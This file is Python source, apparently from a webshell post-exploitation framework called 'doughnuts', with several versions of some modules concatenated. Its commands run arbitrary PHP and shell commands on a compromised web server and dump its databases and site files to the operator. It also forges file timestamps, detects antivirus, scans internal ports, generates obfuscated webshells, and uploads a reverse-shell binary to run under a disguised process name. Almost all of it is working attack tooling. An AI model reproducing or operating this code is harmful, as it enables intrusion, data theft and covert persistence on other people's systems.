def run(file_path: str, web_file_path: str = "", force: bool = False):
"""
upload
Upload file to target system.
eg: upload {file_path} {web_file_path=file_name} {force=False}
"""
flag = True
if (not web_file_path):
web_file_path = path.basename(file_path)
flag = False
try:
fp = open(file_path, "rb")
except FileNotFoundError:
print("\n" + color.red("Local File not exist") + "\n")
return
php = get_php(web_file_path, force)
res = send(php, files={"file": fp})
if (not res):
return
text = res.r_text.strip()
if text == "success":
if (flag):
print(
color.green(
f"\nUpload {file_path} as {web_file_path} success\n"))
else:
print(color.green(f"\nUpload {file_path} success\n"))
return True
elif text == "exist":
print(color.yellow(f"\n{web_file_path} exist\n"))
return True
else:
print("\n" + color.red("Upload error / Privileges not enough") + "\n")
def run(find_path: str = "/usr&/bin"):
"""
av
(Only for windows) Detect anti-virus software running on the target system.
ps: Need to run system commands
Origin: https://github.com/BrownFly/findAV, https://github.com/gh0stkey/avList
"""
if (not is_windows()):
print(color.red("\nTarget system isn't windows\n"))
return
res = send(get_system_code("tasklist /svc"))
if (not res or not res.r_text
or "No system execute function" in res.r_text):
print(color.red("\nDetect error\n"))
return
with open(path.join(gget("root_path"), "auxiliary", "av", "av.json"),
"r",
encoding="utf-8") as f:
av_processes = loads(f.read())
flag = 0
print("\n" + color.green(" " * 37 + "Result"))
for line in res.r_text.split("\n"):
process = line.split(' ')[0]
if process in av_processes:
flag = 1
print(" %40s - %-30s" %
(color.cyan(process), color.yellow(av_processes[process])))
if (not flag):
print(" %40s / %-30s" %
(color.green('No anti-virus'), color.red('Not found')))
print()
def run():
"""
execute
execute Custom PHP code by notepad/vi.
eg: execute
"""
file_name = "tmp" + str(uuid4())
file_path = gget("webshell.download_path", "webshell").replace(":", "_")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name)
with open(real_file_path, "w"):
pass
open_editor(real_file_path)
with open(real_file_path, "r") as f:
code = f.read().strip("<?php").strip("?>")
print(color.yellow("Execute php code..."))
res = send(code)
if (not res):
return
text = res.r_text.strip()
print(color.green("\nResult:\n") + text + "\n")
remove(real_file_path)
def run(web_file_path: str):
"""
write
Write files directly to the target system by notepad/vi.
eg: write {web_file_path}
"""
file_name = path.split(web_file_path)[1]
file_path = gget("webshell.download_path", "webshell").replace(":", "_")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name)
with open(real_file_path, "w"):
pass
open_editor(real_file_path)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\w+", text) and text != '0'):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(
color.red(f"\nWrite {web_file_path} failed.") +
color.yellow("\n\nResponse:") + f"\n{text}\n")
remove(real_file_path)
def run(filename: str = ""):
"""
touch
Create an empty file or Specify a file whose modification time stamp is the same as a random file in the current directory.
eg: touch {filename=this_webshell}
"""
res = send(get_php(filename))
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nSuccessfully created an empty file {filename}.\n"))
elif (len(text) > 0):
print(color.green(f"\nModify time stamp {text} success\n"))
def run(database: str = "", local_path: str = "", encoding: str = "utf8", blocksize: int = 1000, exclude: str = "", include: str = "", threads: int = 5):
"""
db_mdump
Dump a database to a file by block compression and multi threads, Default file name is {database}.sql.
You can use exclude options to exclude some tables.
You can also use include options to dump only some tables.
eg: db_mdump {database=current_database} {local_path=doughnuts/target/site.com/{database}.sql} {encoding="utf-8"} {blocksize=1000} {exclude="",eg="table1,table2"} {include="",eg="table1,table2"} {threads=5}
"""
global LOCK
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
database = database if database else gget("db_dbname", "webshell")
download_path = local_path or gget("webshell.download_path", "webshell")
if not path.exists(download_path):
makedirs(download_path)
res = send(get_table_name_php(database))
if (not res):
return
tables = res.r_text.strip()
with LOCK:
print(color.yellow(f"\n[Try] Dump {database}\n"))
with ThreadPoolExecutor(max_workers=threads) as tp:
all_task = [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table not in exclude.split(",")] if (
not include) else [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table in include.split(",")]
wait(all_task, return_when=ALL_COMPLETED)
with LOCK:
print(color.green(f"\n[Success] Dump {database}\n"))
def run(host: str,
username: str,
password: str,
dbname: str = "",
port: int = 0):
"""
db_init
Initialize the database connection.
"""
res = send(get_php(host, username, password, dbname, port))
if (not res):
return
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print("\n" + color.green("Connect success"))
gset("db_connected", True, True, "webshell")
gset("db_host", host, True, "webshell")
gset("db_username", username, True, "webshell")
gset("db_password", password, True, "webshell")
gset("db_dbname", dbname, True, "webshell")
gset("db_port", port, True, "webshell")
info = res.r_text.strip()
if (info):
info_list = info.split("\n")
try:
gset("db_current_user", info_list[0], True, "webshell")
gset("db_version", info_list[1], True, "webshell")
print_db_info()
except IndexError:
print("\n" + color.red("Select data error") + "\n")
def run(path: str = ".", mode: int = 1):
"""
ls
List information about the files.
eg: ls {path=.} {mode=1}
mode:
- 1 : scandir
- 2 : glob
"""
res = send(get_php(path, mode))
if (not res):
return
info_list = res.r_text.strip().split('\n')
print('\n'.join(info_list[:3]))
ls_wordlist = []
for line in info_list[3:]:
info = line.split(" ")
if (len(info) < 7):
continue
ls_wordlist.append(info[6])
prems, name = info[0], info[-1]
if (prems[0] == 'd'):
info[-1] = color.cyan(name)
info[3] = ''
elif ('x' in prems):
info[-1] = color.green(name)
print("%s %-4s %-4s %6s %s %s %s" %
(info[0], info[1], info[2], info[3], info[4], info[5], info[6]))
for prefix in PREFIX_LIST:
readline.add_prefix_wordlist(prefix, ls_wordlist)
def thread_dump(database, table, encoding, download_path, blocksize, threads):
global LOCK
table = table if table else "None"
retry_time = 5
row_number = -1
while retry_time and row_number == -1:
row_number = get_table_row_number(database, table)
retry_time -= 1
if (row_number != -1):
with LOCK:
print(f"[Retry] fetch {database}.{table} [rows: {row_number}]")
if (row_number == -1):
with LOCK:
print(color.red(f"[Error] fetch {database}.{table}"))
return
file_name = f"{database}.{table}.sql"
file_path = path.join(download_path, file_name).replace("\\", "/")
with LOCK:
print(color.yellow(
f"[Try] fetch {database}.{table} [rows: {row_number}]"))
with open(file_path, "wb") as f, ThreadPoolExecutor(max_workers=threads) as tp:
f.write(get_table_construct(database, table, encoding))
f.flush()
all_task = [tp.submit(get_data, database, table, encoding, offset, blocksize)
for offset in range(0, row_number, blocksize)]
for future in as_completed(all_task):
result = future.result()
if (result):
f.write(future.result())
f.flush()
with LOCK:
print(color.green(
f"[Success] fetch {database}.{table} [rows: {row_number}]"))
def run(database: str = "",
table: str = "",
local_path: str = "",
encoding: str = "utf8"):
"""
db_dump
Dump a database or a table to a file, Default file name is {database}.sql.
eg: db_dump {database=current_database} {local_path=doughnuts/target/site.com/{database}.sql} {encoding="utf-8"}
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
database = database if database else gget("db_dbname", "webshell")
download_path = local_path or gget("webshell.download_path", "webshell")
if not path.exists(download_path):
makedirs(download_path)
file_name = f"{database}.sql" if (not table) else f"{database}.{table}.sql"
res = send(get_php(database, table, encoding))
if (not res):
return
text = res.r_text.strip()
content = res.r_content.strip()
if (len(text) > 0 and res.status_code == 200):
file_path = path.join(download_path, file_name).replace("\\", "/")
with open(file_path, "wb") as f:
f.write(gzinflate(b64decode(content)))
print("\n" + color.green(f"Dump {database} to {file_name} success") +
"\n")
elif ("Error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print(color.red("\nError\n"))
def run(ip: str, ports: str, _type: int = 2, timeout: float = 0.5):
"""
portscan
Scan intranet ports.
eg: portscan {ip} {ports} {_type=[socket|file_get_contents|curl]{1|2|3},default = 2} {timeout=0.5}
"""
if (_type not in [1, 2, 3]):
print(color.red("\nType error!\n"))
return
php = get_php(_type, ip, ports, timeout)
res = send(php)
if (not res):
return
port_result = res.r_json()
# ------------------------------------------
if (len(port_result[0])):
print(
color.green('Open') + ' port:\n' + " " * 4 +
human_friendly_list_print(sorted(port_result[0])) + '\n')
if (len(port_result[1])):
print(
color.red('Close') + ' port:\n' + " " * 4 +
human_friendly_list_print(sorted(port_result[1])) + '\n')
if (len(port_result[2])):
print(
color.magenta('Timeout') + ' port:\n' + " " * 4 +
human_friendly_list_print(sorted(port_result[2])) + '\n')
print("")
def run(web_file_path: str,
local_path: str = "",
_use_raw_php_to_zip: bool = True):
"""
dump
Package and compress files in a folder and download it.
eg: dump {web_file_path} {local_path=./site.com/...}
"""
if _use_raw_php_to_zip:
php = get_raw_php(web_file_path)
else:
php = get_zip_php(web_file_path)
res = send(php)
if (not res):
return
content = res.r_content
download_path = local_path or gget("webshell.download_path", "webshell")
if len(content) and res.status_code == 200:
file_name = (gget("webshell.netloc", "webshell") + ".zip" if
(not len(local_path)) else "")
if not path.exists(download_path):
makedirs(download_path)
file_path = path.join(download_path, file_name).replace("\\", "/")
with open(file_path, "wb") as f:
f.write(content)
print(color.green(f"Downloaded file has been saved to {file_path}"))
else:
print(color.red("File not exist / Download error"))
def run(path: str = "."):
"""
ls
List information about the files.
eg: ls {path=.}
"""
res = send(get_php(path))
if (not res):
return
info_list = res.r_text.strip().split('\n')
print('\n'.join(info_list[:3]))
ls_wordlist = []
for line in info_list[3:]:
info = line.split(" ")
if (len(info) < 7):
continue
prems, name = info[0], info[-1]
if (prems[0] == 'd'):
info[-1] = color.cyan(name)
info[3] = ''
elif ('x' in prems):
info[-1] = color.green(name)
print("%s %-4s %-4s %6s %s %s %s" %
(info[0], info[1], info[2], info[3], info[4], info[5], info[6]))
ls_wordlist.append(info[6])
readline.add_wordlist("ls_wordlist", ls_wordlist)
def run(editor: str = ""):
"""
execute
execute Custom PHP code by notepad / vi as default or your own editor.
eg: execute {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, "a").close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
code = f.read()
if (code.startswith("<?php")):
code = code[5:]
if (code.endswith("?>")):
code = code[:-2]
print(color.yellow("Execute php code..."))
res = send(code)
if (not res):
return
text = res.r_text.strip()
status_code = color.green(str(
res.status_code)) if res.status_code == 200 else color.yellow(
str(res.status_code))
print(
f"\n{color.green('Result:')}\n[{status_code}] {color.cyan('length')}: {len(text)} \n{text}\n"
)
remove(real_file_path)
def run(
web_file_path: str,
local_path: str = "",
) -> bool:
"""
download
Download file(s) from target system.
eg: download {web_file_path} {local_path=./site.com/...}
"""
php = get_php(web_file_path)
res = send(php)
if (not res):
return
content = res.r_content
download_path = local_path or gget("webshell.download_path", "webshell")
if len(content):
file_name = path.split(web_file_path)[1]
if not path.exists(download_path):
makedirs(download_path)
file_path = path.join(download_path, file_name)
with open(file_path, "wb") as f:
f.write(content)
print(color.green(f"Downloaded file has been saved to {file_path}"))
return file_path
else:
print(color.red("File not exist / Download error"))
return ''
def run(web_file_path: str, editor: str = ""):
"""
write
Write files directly to the target system by notepad / vi as default or your own editor.
eg: write {web_file_path} {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, 'a').close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(color.red(f"\nWrite {web_file_path} failed.\n"))
remove(real_file_path)
def run(lhost: str,
port: int,
mode: int = 0,
fakename: str = "/usr/lib/systemd"):
"""
reshell
Bind a local port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}
"""
if (is_windows(False) or is_windows()):
print(color.red(f"Only for both system is linux."))
return False
try:
port = int(port)
except ValueError:
port = 23333
disable_func_list = gget("webshell.disable_functions", "webshell")
MODE = 1
print(color.yellow(f"Waring: You are using a testing command...."))
print(color.yellow(f" Please make sure Port {port} open...."))
if (mode == 0):
if (has_env("python")):
print(color.green(f"Traget has python environment."))
MODE == 1
else:
print(color.red(f"Traget has not python environment."))
MODE == 2
else:
MODE = int(mode)
if ("proc_open" in disable_func_list):
print(color.red("proc_open is disabled... Try Mode 3"))
return
if (MODE == 1):
print(color.yellow(f"Use Mode 1->python"))
command = get_php(lhost, port)
else:
print(color.yellow(f"Use Mode 2->upload"))
filename = encrypt(f"{lhost}-{port}")
if not upload(
path.join(gget("root_path"), "auxiliary", "reshell",
"reverse_server_x86_64"), "/tmp/%s" % filename,
True):
return
command = get_system_code(
f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}",
False)
t = Thread(target=delay_send, args=(2, command))
t.setDaemon(True)
t.start()
print(f"Bind port {color.yellow(str(port))}...")
if (not bind(port, MODE)):
print(color.red(f"Bind port error."))
if (MODE == 3):
res = send(f"unlink('/tmp/{filename}');")
if (not res):
return
def run(*coomands):
"""
lsh
Run a command on local machine.
"""
command = str(value_translation(gget("raw_command_args")))
if (command):
if (command.startswith("cd ")):
chdir(command[3:])
print(
color.green("\nResult:\n\n") +
"current working directory:\n\n " + getcwd() + "\n")
else:
print(color.green("\nResult:\n"))
system(command)
print()
def run(host: str, username: str, password: str, dbname: str = "", port: int = 0, dbms: str = "mysql"):
"""
db_init
Initialize the database connection.
Support dbms:
- mysql
- mssql
- access
eg: db_init {host} {username} {password} {dbname=''} {port=0} {dbms='mysql'}
"""
dbms = dbms.lower()
db_ext = dbms
res = send(detect_ext("PDO", "mysqli"))
if (not res): # 探测是否存在pdo/mysqli扩展
print("\n" + color.red("Detect error") + "\n")
return
text = res.r_text.lower()
if (dbms == "mysql" and not text):
print("\n" + color.red("No PDO and mysqli extension") + "\n")
return
elif ("pdo" not in text):
print("\n" + color.red("No PDO extension") + "\n")
return
if (dbms in PDO_DMBS_EXT_DICT):
res = send(detect_ext(*PDO_DMBS_EXT_DICT[dbms]))
text = res.r_text.strip()
if (not res): # 探测pdo支持的mssql扩展
print("\n" + color.red(f"Detect PDO extension for {dbms} error") + "\n")
return
db_ext = text.split(",")[0][4:]
gset("db_dbms", dbms, True, "webshell")
gset("db_ext", db_ext, True, "webshell")
gset("db_connect_type", text.split(",")[0], True, "webshell")
res = send(get_php(host, username, password, dbname, port))
if (not res):
return
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print("\n" + color.green("Connect success"))
gset("db_connected", True, True, "webshell")
gset("db_host", host, True, "webshell")
gset("db_username", username, True, "webshell")
gset("db_password", password, True, "webshell")
gset("db_dbname", dbname, True, "webshell")
gset("db_port", port, True, "webshell")
info = res.r_text.strip()
if (info):
info_list = info.split("\n")
try:
gset("db_current_user", info_list[0], True, "webshell")
gset("db_version", info_list[1], True, "webshell")
print_db_info()
except IndexError:
print("\n" + color.red("Select data error") + "\n")
def run(proxy_url: str = ""):
"""
proxy
Set proxy for requests, Support socks and http, Set None to unset.
eg: proxy {proxy_url='http://127.0.0.1:10808'}
"""
if (proxy_url == ""):
print("\n" +
color.green(f"Current proxy: {gget('proxy_url', 'webshell')}") +
"\n")
else:
if (proxy_url.lower() == "none"):
proxy_url = None
Session.proxies = {'http': proxy_url, 'https': proxy_url}
print("\n" + color.green(f"Set proxy: proxy {proxy_url}") + "\n")
gset("proxy_url", proxy_url, True, namespace="webshell")
def run(*commands):
"""
shell
Get a temporary shell of target system by system function or just run a shell command.
"""
command = str(value_translation(gget("raw_command_args")))
if (command):
res = send(get_system_code(command))
if (not res):
return
print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
return
print(
color.cyan(
"Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n"
))
res = send(
f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());'
).r_text.strip()
prompt, pwd = res.split("|")
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_WINDOWS_WORDLIST if (
is_windows()) else NEW_UNIX_WORDLIST)
if is_windows():
prompt = "%s> "
else:
prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ "
try:
while gget("loop"):
print(prompt % pwd, end="")
command = str(value_translation(readline()))
lower_command = command.lower()
if (lower_command.lower() in ['exit', 'quit', 'back']):
print()
break
if (command == ''):
print()
continue
b64_pwd = base64_encode(pwd)
if (lower_command.startswith("cd ") and len(lower_command) > 3):
path = base64_encode(lower_command[3:].strip())
res = send(
f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
)
if (not res):
return
pwd = res.r_text.strip()
else:
res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' +
get_system_code(command))
if (not res):
return
print("\n" + res.r_text.strip() + "\n")
finally:
readline.set_wordlist(wordlist)
def run(file_name: str,
keyword: str = "POST",
passwd: str = "",
salt: str = "",
_type: int = 1):
"""
generate
Generate a webshell using doughnuts encoding (password and salt none is random).
keyword:
- GET
- POST
- COOKIE
- HEADER
_type:
- 1 : Pudding
- 2 : Icecream
- 3 : Popsicle
- 4 : Gululingbo
"""
raw_keyword = keyword.upper()
if (raw_keyword not in keyword_dict):
print(color.red("\nKeyword error\n"))
return
keyword = keyword_dict[raw_keyword]
if (_type not in type_dict):
print(color.red("\nType error\n"))
return
passwd = str(passwd) if passwd else ranstr(randint(5, 8))
salt = str(salt) if salt else ranstr(randint(5, 8))
php = get_php(keyword, passwd, salt, _type)
file_path, file_name = path.split(path.realpath(file_name))
file_real_path = path.join(file_path, file_name)
if (path.exists(file_real_path)):
print(color.red("\nFile is exist\n"))
return
elif (not path.exists(file_path)):
print(color.red("\nFile path is invalid\n"))
return
with open(file_real_path, "w+") as f:
f.write(php)
print(
color.green(
f"\ngenerate {type_dict[_type]}'s php in {file_real_path}! enjoy it!"
))
print(color.yellow("\nUsage:"))
print(
color.yellow(
f" Interactive interface : connect url {raw_keyword} {passwd} doughnuts-{salt}"
))
print(
color.yellow(
f" Non-Interactive interface: doughnuts connect url {raw_keyword} {passwd} doughnuts-{salt}\n"
))
def run(filename: str = ""):
"""
touch
Create an empty file or (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory.
eg: touch {filename=this_webshell}
"""
command = get_system_code("touch -r $reference $file", False)
res = send(get_php(filename, command))
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nSuccessfully created an empty file {filename}.\n"))
elif ("No system execute function!" in text):
print(color.red("\nall the system execute commands are disabled.\n"))
else:
print(color.green(f"\nModify time stamp {text} success.\n"))
def run():
"""
db_shell
Get a temporary sql shell of target system.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
print(
color.cyan(
"Eenter interactive temporary sql shell...\n\nUse 'back' command to return doughnuts.\n"
))
database = gget("db_dbname", "webshell")
prompt = "mysql (%s) > "
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_SQL_WORDLIST)
try:
while gget("loop"):
print(prompt % color.cyan(database), end="")
command = readline()
lower_command = command.lower()
if (lower_command.lower() in ['exit', 'quit', 'back']):
print()
break
if (command == ''):
print()
continue
if (lower_command.startswith("use ") and len(lower_command) > 4):
try:
temp_database = match("use ([^;]*);?",
lower_command).group(1)
res = send(check_database(temp_database))
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
database = temp_database
print("\n" + color.green(
f"Change current database: {database}") + "\n")
except (IndexError, AttributeError):
print("\n" + color.red("SQL syntax error") + "\n")
else:
form = execute_sql_command(command, database)
if (form == ''):
print("\n" +
color.red("Connection Error / SQL syntax error") +
"\n")
else:
print(execute_sql_command(command, database))
finally:
gset("db_dbname", database, True, "webshell")
readline.set_wordlist(wordlist)
def run(*commands):
"""
webshell
Get a webshell of target system or just run a webshell command.
"""
command = gget("raw_command_args")
if (command):
res = send((command))
if (not res):
return
print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
return
print(
color.cyan(
"Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n"
))
pwd = send(f'print(getcwd());').r_text.strip()
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_WORDLIST)
try:
while gget("loop"):
print(f"webshell:{pwd} >> ", end="")
data = readline(b"(")
lower_data = data.lower()
if (lower_data.lower() in ['exit', 'quit', 'back']):
print()
break
if (data == ''):
print()
continue
data = base64_encode(data)
b64_pwd = base64_encode(pwd)
if (lower_data.startswith("cd ") and len(lower_data) > 3):
path = base64_encode(lower_data[3:].strip())
res = send(
f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
)
if (not res):
return
pwd = res.r_text.strip()
else:
res = send(
f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{data}\'));");'
)
if (not res):
return
print("\n" + res.r_text.strip() + "\n")
finally:
readline.set_wordlist(wordlist)
def run():
"""
pdf
print disable_functions of website.
"""
disable_func_list = gget("webshell.disable_functions", "webshell")
if len(disable_func_list):
print(color.green("\ndisable_functions:\n"))
print(" " + "\n ".join(disable_func_list) + "\n")
else:
print(
f"{color.green('No disable_functions')} / {color.red('Read error')}"
)
def run(timeout: float = 2.0):
"""
check
Check if each webshell is alive.
eg: check {timeout=2.0}
"""
if not exists("webshell.log"):
print(color.red("No webshell.Log"))
return 0
with open("webshell.log", "r") as f:
for index, line in enumerate(f, 1):
url, method, pwd, *encode_functions = line.split("|")
if method == "GET":
raw_key = "params"
elif method == "POST":
raw_key = "data"
elif method == "COOKIE":
raw_key = "cookies"
elif method == "HEADER":
raw_key = "headers"
else:
print(
f"[{color.blue(str(index))}] {color.red('Method error')}")
continue
check_command = "print(md5(1));"
encode_pf = gget("encode.pf")
for func in encode_functions:
if func in encode_pf:
check_command = encode_pf[func].run(check_command)
params_dict = {"data": {}, "timeout": timeout}
params_dict[raw_key] = {}
params_dict[raw_key][pwd] = check_command
common_text, status_code_text = "", "000"
try:
res = post(url, verify=False, **params_dict)
status_code_text = str(res.status_code)
if ("c4ca4238a0b923820dcc509a6f75849b" in res.text):
common_text = color.green("Alive")
else:
common_text = color.red("Not Alive")
except exceptions.Timeout:
common_text = color.yellow("Timeout")
except exceptions.RequestException:
common_text = color.red("Request error")
print(
f"[{color.blue(str(index))}] [{color.yellow(status_code_text)}] {common_text} {url}"
)
def run(database: str):
"""
db_use
Change current database.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
res = send(get_php(database))
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print("\n" + color.green(f"Change current database: {database}") +
"\n")
gset("db_dbname", database, True, "webshell")
def run(pattern: str):
"""
read
Search file(s) from target system.
eg: search {pattern}
"""
res = send(get_php(pattern))
if (not res):
return
files = res.r_text.strip()
if (len(files)):
print("\n" + color.green("Search Result:") + "\n " +
files.replace("./", "").replace("\n", "\n ") + "\n")
else:
print("\n" + color.red("File not exist / Search error") + "\n")
def run(*web_file_paths):
"""
rm
Delete target system file(s).
eg: remove {web_file_path1} {web_file_path2} ..
"""
for each_file_path in web_file_paths:
php = get_php(each_file_path)
res = send(php)
if (not res):
return
text = res.r_text.strip()
if (text == 'success'):
print("\n" + color.green(f"Delete {each_file_path} success.") + "\n")
else:
print("\n" + color.red(f"Delete {each_file_path} failed.") + "\n")